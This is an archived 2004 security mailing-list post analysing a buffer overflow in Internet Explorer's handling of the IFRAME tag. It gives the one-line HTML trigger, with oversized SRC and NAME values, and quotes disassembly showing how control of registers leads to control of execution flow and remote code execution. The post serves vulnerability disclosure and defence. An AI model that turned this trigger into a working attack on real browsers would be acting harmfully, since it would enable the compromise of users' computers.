Date: Mon, 25 Oct 2004 03:55:10 +0200
From: "Berend-Jan Wever" <skylined@...p.tudelft.nl>
To: "ned" <nd@...inemenace.org>, <bugtraq@...urityfocus.com>
Cc: <full-disclosure@...ts.netsys.com>
Subject: Re: python does mangleme (with IE bugs!)

Hi all, here's my analysis of these bugs:

2445.html does nothing on my win2ksp4en/ie6.0sp1. (IE does crash when you load it because the META refresh tag leads to 2446.html.)
2446.html contains an exploitable BoF in the IFRAME tag using the SRC and NAME property. To trigger the BoF you only need this tag in a HTML file:
<IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">

Exactly why or how it happens, I do not know yet. I do know you can control EAX, after which this gets executed:
7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
7178EC04                      68 847B7071     PUSH    SHDOCVW.71707B84
7178EC09                      50              PUSH    EAX
7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
Control over EAX leads to control over ECX, which you can use to control EIP: Remote Command Execution.

They'd better patch this one quickly, a reliable working exploit shouldn't take more then a day to code.

Cheers,
SkyLined